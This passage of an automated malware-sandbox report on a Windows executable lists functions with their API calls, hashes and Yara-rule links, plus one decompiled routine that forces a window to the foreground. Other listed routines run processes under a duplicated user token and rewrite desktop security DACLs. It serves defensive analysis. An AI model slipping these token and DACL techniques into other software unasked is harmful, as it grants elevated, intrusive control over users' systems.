                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: std::exception::exception$Exception@8Throw_malloc_memset
                • String ID:
                • API String ID: 1169493612-0
                • Opcode ID: b0cfd0f3e655868c2df465b917cf690a448a7e8f137223fc54bf29c66948d2c7
                • Instruction ID: fb8758454a4169f6ea6cb716d9bd611d3e7b95ce1d225cd118e08c518df59203
                • Opcode Fuzzy Hash: b0cfd0f3e655868c2df465b917cf690a448a7e8f137223fc54bf29c66948d2c7
                • Instruction Fuzzy Hash: 5B11F3B52002009FD310EF5DD481F52BBA5EF99714F24856EE2899B3A2D776F801CBE0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0043C141, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004014F7: _malloc.LIBCMT ref: 00401511
                • _memmove.LIBCMT ref: 0043C17E
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _malloc_memmove
                • String ID:
                • API String ID: 1183979061-0
                • Opcode ID: c365c34210ff95b2339fc68297d86fd64c042ffe90da983951cbe4172abaa356
                • Instruction ID: f2956771a46b83dc8bf1250247639b643a95568cc80308f28d0423b2baee3325
                • Opcode Fuzzy Hash: c365c34210ff95b2339fc68297d86fd64c042ffe90da983951cbe4172abaa356
                • Instruction Fuzzy Hash: 00017174200650AFC721AF59C981D67B7E8EF99744B10885EF8D697702C639FC02CBA8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0045FD26, Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _wcscpy
                • String ID:
                • API String ID: 3048848545-0
                • Opcode ID: c268edffd11c4cbb4d224b8625af7d214eeeb5606354a08f8d4cf2e0546bcfa6
                • Instruction ID: 7edf0b2e17a987865fa45eeb4fb6676dc6e517ce9500816896bcded1e52213ff
                • Opcode Fuzzy Hash: c268edffd11c4cbb4d224b8625af7d214eeeb5606354a08f8d4cf2e0546bcfa6
                • Instruction Fuzzy Hash: B1F05C331142183596106F66AC42CEBB39CEF93371310062BFA185B182E522744983F4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F2920, Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _memmove
                • String ID:
                • API String ID: 4104443479-0
                • Opcode ID: fd4eb98bc5c31b184ba657d102e448ce59a1949e6232b37593128c09ce2594a6
                • Instruction ID: 9958db5c138cc601615ef656131045aa20bb8572b3d2b6ed1a21e4557def73cb
                • Opcode Fuzzy Hash: fd4eb98bc5c31b184ba657d102e448ce59a1949e6232b37593128c09ce2594a6
                • Instruction Fuzzy Hash: D7F082713001009FC369AB2CE846D7773E4DFC9314711846EF05AC7255DA39EC418BA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FECD0, Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004014F7: _malloc.LIBCMT ref: 00401511
                • CharUpperBuffW.USER32(?,?), ref: 003FED03
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: BuffCharUpper_malloc
                • String ID:
                • API String ID: 1573836695-0
                • Opcode ID: 9078eb72361205e2b262cd6ba9812fc8f40d600d4a03ef740f1a801219a4fc15
                • Instruction ID: 3f0335d24613e17f32eed16c00218eaedbfc86ea6e92105d2424aa3d94dacdb6
                • Opcode Fuzzy Hash: 9078eb72361205e2b262cd6ba9812fc8f40d600d4a03ef740f1a801219a4fc15
                • Instruction Fuzzy Hash: 01F012706006248FDB215F54E541736B7A4EF04751F05816AFD498F256C774DC01CBD5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FD9C0, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                Download Yara Rule
                APIs
                • FindCloseChangeNotification.KERNELBASE(?,?,00416F2F), ref: 003FD9DD
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ChangeCloseFindNotification
                • String ID:
                • API String ID: 2591292051-0
                • Opcode ID: 4e0204f671e7d1510d25c756377ff9799c0bde6a4ea0d8504783902811c4441e
                • Instruction ID: eb15e747c454b14c08b25e3d09a849ef05ac2447ad329b7db107b248b54de0b2
                • Opcode Fuzzy Hash: 4e0204f671e7d1510d25c756377ff9799c0bde6a4ea0d8504783902811c4441e
                • Instruction Fuzzy Hash: FEE04EB4900B019A87318F6AE444416FBF9AFE02213208E1FD5EAC2A64C3B4A1898F50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00433D3A, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                Download Yara Rule
                APIs
                • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,00416340,?,00477AAC,00000003,003FE0B0,?,?,00000001), ref: 00433D58
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FileWrite
                • String ID:
                • API String ID: 3934441357-0
                • Opcode ID: 140cb20aced830eed5ce5de5f8d8f8f96b472884116767672cc04b0ecc840f90
                • Instruction ID: e41d2aa864f0b09555650bf4de3605ab4fdc4f7ac5c0cf7fb11def8084f694e4
                • Opcode Fuzzy Hash: 140cb20aced830eed5ce5de5f8d8f8f96b472884116767672cc04b0ecc840f90
                • Instruction Fuzzy Hash: F6E01276100318ABCB50DF98D844FDA77BCEF48760F00851AFA188B200C7B4EA808BE4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FE270, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                Download Yara Rule
                APIs
                • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,?,00000001,?,00002000), ref: 003FE288
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FilePointer
                • String ID:
                • API String ID: 973152223-0
                • Opcode ID: 01239aa13af2bf130d477de33c6269f321014cf5d34444435aa0b7c7d5c94b3b
                • Instruction ID: 6542a9ea5c7d25e7259abcdb22e0c5545be240ef33f4aece62782724945428e2
                • Opcode Fuzzy Hash: 01239aa13af2bf130d477de33c6269f321014cf5d34444435aa0b7c7d5c94b3b
                • Instruction Fuzzy Hash: 89E01275600208BFC704DFA4DC45DAA7779E748201F008268FD05D7340D671AD5086A5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0042397D, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                Download Yara Rule
                APIs
                • GetFileAttributesW.KERNELBASE(?), ref: 00423984
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: ed736006c9f301a0ce6fc741c094eba95c5302dba2aff9dbec8be4974aa9a385
                • Instruction ID: 76e4296d87789036f81a7c427aaa4ab6cfd668eb6e9c1a3d68b3cd9c2e8bd12d
                • Opcode Fuzzy Hash: ed736006c9f301a0ce6fc741c094eba95c5302dba2aff9dbec8be4974aa9a385
                • Instruction Fuzzy Hash: CEC08071140318568E040DEC754D4D6375C554333D7C41E51F96C876D1C67EBDD3965C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004017FA, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • _doexit.LIBCMT ref: 00401806
                  • Part of subcall function 004016BA: __lock.LIBCMT ref: 004016C8
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: __lock_doexit
                • String ID:
                • API String ID: 368792745-0
                • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                • Instruction ID: 19f3d928d41a38a9c1d7ca79ef608110069a83ec2b7c6921bca29636656df928
                • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                • Instruction Fuzzy Hash: EDB0923258020833DA202582AC07F063A1A87C0B64E280521BA0C2A1E1A9A3A9A18089
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004048E2, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: __wfsopen
                • String ID:
                • API String ID: 197181222-0
                • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                • Instruction ID: acc76463798426c7f887c0760da818458ee281c6bc186df88d642c2db19eb8f2
                • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                • Instruction Fuzzy Hash: FFC092B744024C77CF112A83ED02F4A3F5A9BC0B64F048021FB1C295A1AA77EA6196D9
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 004243FF, Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004243FF(struct HWND__* _a4) {
				long _v8;
				int _v12;
				struct HWND__* _t13;
				DWORD* _t15;
				long _t20;
				int _t24;
				long _t39;
				struct HWND__* _t45;
				long _t46;
				struct HWND__* _t47;

				_t13 = GetForegroundWindow();
				_t45 = _a4;
				_t47 = _t13;
				if(_t45 != _t47) {
					if(_t47 == 0) {
						_t47 = FindWindowW(L"Shell_TrayWnd", _t47);
					}
					if(IsIconic(_t45) != 0) {
						ShowWindow(_t45, 9);
					}
					_v12 = 0;
					_t15 = SetForegroundWindow(_t45);
					if(_t15 != 0) {
						return 2;
					} else {
						_t46 = GetWindowThreadProcessId(_t47, _t15);
						_t39 = GetCurrentThreadId();
						_t20 = GetWindowThreadProcessId(_a4, 0);
						_v8 = _t20;
						AttachThreadInput(_t39, _t20, 1);
						AttachThreadInput(_t39, _t46, 1);
						AttachThreadInput(_t46, _v8, 1);
						_t24 = SetForegroundWindow(_a4);
						if(_t24 != 0) {
							_v12 = 3;
						} else {
							keybd_event(0x12, MapVirtualKeyW(0x12, _t24), _t24, _t24);
							keybd_event(0x12, MapVirtualKeyW(0x12, 0), 2, 0);
							keybd_event(0x12, MapVirtualKeyW(0x12, 0), 0, 0);
							keybd_event(0x12, MapVirtualKeyW(0x12, 0), 2, 0);
							if(SetForegroundWindow(_a4) != 0) {
								_v12 = 4;
							}
						}
						AttachThreadInput(_t39, _v8, 0);
						AttachThreadInput(_t39, _t46, 0);
						AttachThreadInput(_t46, _v8, 0);
						return _v12;
					}
				} else {
					return 1;
				}
			}













                0x00424407
                0x0042440d
                0x00424410
                0x00424414
                0x00424425
                0x00424433
                0x00424433
                0x0042443e
                0x00424443
                0x00424443
                0x0042444a
                0x00424451
                0x00424459
                0x0042454d
                0x0042445f
                0x0042446a
                0x00424472
                0x0042447a
                0x00424486
                0x00424489
                0x0042448f
                0x00424498
                0x0042449e
                0x004244a6
                0x00424518
                0x004244a8
                0x004244b6
                0x004244cd
                0x004244e4
                0x004244fb
                0x0042450d
                0x0042450f
                0x0042450f
                0x0042450d
                0x00424526
                0x0042452c
                0x00424535
                0x00424540
                0x00424540
                0x00424417
                0x00424420
                0x00424420

                APIs
                • GetForegroundWindow.USER32 ref: 00424407
                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0042442D
                • IsIconic.USER32 ref: 00424436
                • ShowWindow.USER32(?,00000009), ref: 00424443
                • SetForegroundWindow.USER32(?), ref: 00424451
                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00424468
                • GetCurrentThreadId.KERNEL32 ref: 0042446C
                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0042447A
                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00424489
                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0042448F
                • AttachThreadInput.USER32(00000000,?,00000001), ref: 00424498
                • SetForegroundWindow.USER32(00000000), ref: 0042449E
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004244AD
                • keybd_event.USER32 ref: 004244B6
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004244C4
                • keybd_event.USER32 ref: 004244CD
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004244DB
                • keybd_event.USER32 ref: 004244E4
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004244F2
                • keybd_event.USER32 ref: 004244FB
                • SetForegroundWindow.USER32(00000000), ref: 00424505
                • AttachThreadInput.USER32(00000000,?,00000000), ref: 00424526
                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 0042452C
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                • String ID: Shell_TrayWnd
                • API String ID: 2889586943-2988720461
                • Opcode ID: 3d732c405d62bbf98401b17a0766e9a25a03a44eb39093922c88271fecc16cdc
                • Instruction ID: 7133001f7b84f7bfe46e2646bba7a9723e9d441e9ac7adde1229f505a74266de
                • Opcode Fuzzy Hash: 3d732c405d62bbf98401b17a0766e9a25a03a44eb39093922c88271fecc16cdc
                • Instruction Fuzzy Hash: D04153717402147FE7245BA4AE4AFBE7B6CDB84B11F10402AFA09EB1D0D6F459809BA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00436219, Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 234processCOMMON
                Download Yara Rule
                APIs
                • _memset.LIBCMT ref: 00436243
                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00436294
                • CloseHandle.KERNEL32(?), ref: 004362A6
                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004362BE
                • GetProcessWindowStation.USER32 ref: 004362D7
                • SetProcessWindowStation.USER32(00000000), ref: 004362E1
                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004362FD
                • _wcslen.LIBCMT ref: 0043639E
                  • Part of subcall function 004014F7: _malloc.LIBCMT ref: 00401511
                • _wcsncpy.LIBCMT ref: 004363C6
                • LoadUserProfileW.USERENV(?,00000020), ref: 004363DF
                • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004363F9
                • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00436428
                • UnloadUserProfile.USERENV(?,?), ref: 0043645B
                • CloseWindowStation.USER32(00000000), ref: 00436472
                • CloseDesktop.USER32(?), ref: 00436480
                • SetProcessWindowStation.USER32(?), ref: 0043648E
                • CloseHandle.KERNEL32(?), ref: 00436498
                • DestroyEnvironmentBlock.USERENV(?), ref: 004364AF
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
                • String ID: $default$winsta0
                • API String ID: 2173856841-1027155976
                • Opcode ID: 4338fbde08e8536bf0e631538042279884627ad7de838f85fc568e42ea7e5a3b
                • Instruction ID: 5d335f63aa796c3b87b05e3a5deb3dcb35a681525c29cf2490d566998fc1f2ce
                • Opcode Fuzzy Hash: 4338fbde08e8536bf0e631538042279884627ad7de838f85fc568e42ea7e5a3b
                • Instruction Fuzzy Hash: AF818F70E0020ABBDB10DFA4CD4AFAF77B8AF48704F15811AF914A7281D7B8D941CB69
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00421A73, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                Download Yara Rule
                APIs
                • FindFirstFileW.KERNEL32(?,?), ref: 00421A97
                • GetFileAttributesW.KERNEL32(?), ref: 00421AD4
                • SetFileAttributesW.KERNEL32(?,?), ref: 00421AEA
                • FindNextFileW.KERNEL32(00000000,?), ref: 00421AFC
                • FindClose.KERNEL32(00000000), ref: 00421B0D
                • FindClose.KERNEL32(00000000), ref: 00421B21
                • FindFirstFileW.KERNEL32(*.*,?), ref: 00421B3C
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00421B83
                • SetCurrentDirectoryW.KERNEL32(0047AB0C), ref: 00421BA7
                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00421BAF
                • FindClose.KERNEL32(00000000), ref: 00421BBA
                • FindClose.KERNEL32(00000000), ref: 00421BC8
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                • String ID: *.*
                • API String ID: 1409584000-438819550
                • Opcode ID: a82d3c60c48cf829ad5c2d8f4c4a1295047b4b95c31dd1c89f337ed4c0a7b069
                • Instruction ID: 95bf813be199b7eb69b3cb3bd60cec894b5a95bc5b739d220d0c4ccfff250f0d
                • Opcode Fuzzy Hash: a82d3c60c48cf829ad5c2d8f4c4a1295047b4b95c31dd1c89f337ed4c0a7b069
                • Instruction Fuzzy Hash: 3641D8726003146FC700EF65EC41EAB77ACEA95311F444A2FF958C3190E779E919C7A9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0043280D, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                Download Yara Rule
                APIs
                • FindFirstFileW.KERNEL32(?,?), ref: 0043282F
                • FindNextFileW.KERNEL32(00000000,?), ref: 00432892
                • FindClose.KERNEL32(00000000), ref: 004328A3
                • FindClose.KERNEL32(00000000), ref: 004328B7
                • FindFirstFileW.KERNEL32(*.*,?), ref: 004328D4
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00432923
                • SetCurrentDirectoryW.KERNEL32(0047AB0C), ref: 00432946
                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00432950
                • FindClose.KERNEL32(00000000), ref: 0043295B
                  • Part of subcall function 00423BED: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00423C0F
                • FindClose.KERNEL32(00000000), ref: 00432969
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                • String ID: *.*
                • API String ID: 2640511053-438819550
                • Opcode ID: 4f6154c7702d20344f19e07c40d1934ff9cb748af6a2ee1e3095019a6807c423
                • Instruction ID: 80f5b98b788b931d1389de46317c7341cba4560d25c85307fb274a39477ffa67
                • Opcode Fuzzy Hash: 4f6154c7702d20344f19e07c40d1934ff9cb748af6a2ee1e3095019a6807c423
                • Instruction Fuzzy Hash: E141EF726001186BCB14EF64ED45FEF736CDF8D311F1046A7ED08A3280D6B99A55CA69
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0043602A, Relevance: 18.2, APIs: 12, Instructions: 182COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00426DB5: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00426DCF
                  • Part of subcall function 00426DB5: GetLastError.KERNEL32(?,00000000,?), ref: 00426DD9
                  • Part of subcall function 00426DB5: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00426DFF
                  • Part of subcall function 00426D81: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00426D9C
                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00436090
                • _memset.LIBCMT ref: 004360A5
                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004360C4
                • GetLengthSid.ADVAPI32(?), ref: 004360D6
                • GetAce.ADVAPI32(?,00000000,?), ref: 00436113
                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0043612F
                • GetLengthSid.ADVAPI32(?), ref: 00436147
                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00436170
                • CopySid.ADVAPI32(00000000), ref: 00436177
                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004361A9
                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004361CB
                • SetUserObjectSecurity.USER32 ref: 004361DE
                Memory Dump Source
